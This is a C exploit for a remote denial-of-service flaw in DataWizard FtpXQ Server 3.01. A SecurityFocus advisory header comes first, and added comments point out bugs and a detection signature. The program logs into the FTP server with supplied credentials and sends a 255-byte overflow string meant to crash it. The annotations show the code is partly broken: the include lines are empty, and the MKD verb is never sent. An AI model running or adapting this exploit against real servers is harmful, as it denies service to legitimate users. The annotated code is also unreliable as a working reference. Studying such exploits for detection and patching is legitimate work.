// source: https://www.securityfocus.com/bid/20721/info
//
// DataWizard FtpXQ Server is prone to multiple remote vulnerabilities:
// - A remote denial-of-service issue occurs because the application fails to
//   perform adequate bounds checks on user-supplied data before copying it to
//   an insufficiently sized buffer. An attacker could exploit this issue to
//   crash the application, denying access to legitimate users.
// - The application creates two testing accounts by default. An attacker can
//   access these accounts to gain read/write privileges on the server, which
//   could result in the compromise of the affected computer.
// FtpXQ Server 3.01 is vulnerable; other versions may also be affected.

/*
 * 0xf_ftpxq.c - FTPXQ Denial of service exploit.
 * Federico Fazzi
 *
 * advisory by Eric Sesterhenn.
 * -- Server built using the WinsockQ from DataWizard Technologies. A security
 * -- vulnerability in the product allows remote attackers to overflow an
 * -- internal buffer by providing an overly long "make directory" request.
 *
 * r20061025.
 */

/* NOTE: the nine header names were lost in extraction (the page shows bare
 * "#include" directives); they are reproduced here exactly as found. */
#include
#include
#include
#include
#include
#include
#include
#include
#include

// AAAAAAAAAAAAAAAA..AA*255 in hex format.
/* 255 bytes of 'A' (0x41): the over-long "make directory" argument the
 * advisory describes.  The length is fixed here; nothing on this page states
 * the size of the server-side buffer, only that this input exceeds it. */
char bof[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41";

/*
 * Entry point.  Expects four arguments: host, port, user, password (the
 * usage string's argument list was lost in extraction).
 *
 * Resolves the host, opens a TCP connection, sends USER and PASS built from
 * argv[3]/argv[4], writes bof to the socket, then performs one blocking
 * read() to guess whether the server dropped the connection.
 *
 * Returns 0 after the probe; calls exit(1) on a usage error or when
 * gethostbyname(), socket() or connect() fails.
 *
 * Defender notes: the USER/PASS step is why the advisory's default "testing"
 * accounts matter - removing them denies this tool the authenticated session
 * it needs.  On the wire the probe is a USER line, a PASS line and then a bare
 * 255-byte run of 0x41 (see the write() call below), which is a usable
 * detection signature.
 */
int main(int argc, char **argv)
{
    int sd;
    socklen_t len;
    struct sockaddr_in saddr;
    struct hostent *he;
    char buf[512], tmpbuf[128];   /* buf: outgoing lines; tmpbuf: one server reply */

    if(argc != 5) {
        printf("FTPXQ Server - Denial of service exploit.\n"
               "Federico Fazzi \n\n"
               "usage: %s \n", argv[0]);
        exit(1);
    }

    /* gethostbyname() is obsolete and not thread-safe; getaddrinfo() is the
     * modern replacement.  Left as written. */
    if((he = gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname()");
        exit(1);
    }

    // init socket
    if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("socket()");
        exit(1);
    }

    // setup struct (bzero/bcopy are BSD legacy spellings of memset/memcpy)
    bzero((char *) &saddr, sizeof(saddr));
    saddr.sin_family = AF_INET;
    bcopy((char *)he->h_addr, (char *)&saddr.sin_addr.s_addr, he->h_length);
    /* atoi() yields 0 for a non-numeric port with no error indication;
     * strtol() with endptr/errno checks would let bad input be rejected. */
    saddr.sin_port = htons(atoi(argv[2]));
    len = sizeof(struct sockaddr);

    // init connection (the socket is not closed on the exit(1) paths)
    if(connect(sd, (struct sockaddr *)&saddr, len) == -1) {
        perror("connect()");
        exit(1);
    }

    printf("FTPXQ Server - Denial of service exploit.\n"
           "Federico Fazzi \n"
           "---------------------------------------\n");
    puts("connecting..\t\t done");

    // sending USER data to the daemon
    /* sprintf() into the 512-byte buf is unbounded: an over-long argv[3]
     * overflows this program's own stack buffer.  snprintf(buf, sizeof buf,
     * ...) would bound it.  The same applies to the PASS and MKD formats
     * below.  write() return values are never checked, so a short or failed
     * write is not detected. */
    sprintf(buf, "USER %s\r\n", argv[3]);
    write(sd, buf, strlen(buf));
    puts("sending USER data..\t done");

    // sending PASS data to the daemon
    sprintf(buf, "PASS %s\r\n", argv[4]);
    write(sd, buf, strlen(buf));
    puts("sending PASS data..\t done");

    // sending the BOF string with the MKD command to the host
    sprintf(buf, "MKD %s", bof);
    /* NOTE: buf is formatted above, but the write() below sends bof itself,
     * so neither the "MKD " verb nor a line terminator reaches the socket. */
    write(sd, bof, strlen(bof));
    puts("sending MKD bof string.. done");

    // now checking if the server is down
    /* Heuristic only: a single blocking read() with no timeout.  A positive
     * return means the server answered; 0 (peer closed) and -1 (error) are
     * both reported as "down", and a merely slow server blocks here
     * indefinitely.  tmpbuf is never NUL-terminated or inspected. */
    if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0)
        puts("[!] server doesn't vulnerable");
    else
        puts("[+] server getting down.. done");

    close(sd);
    return(0);
}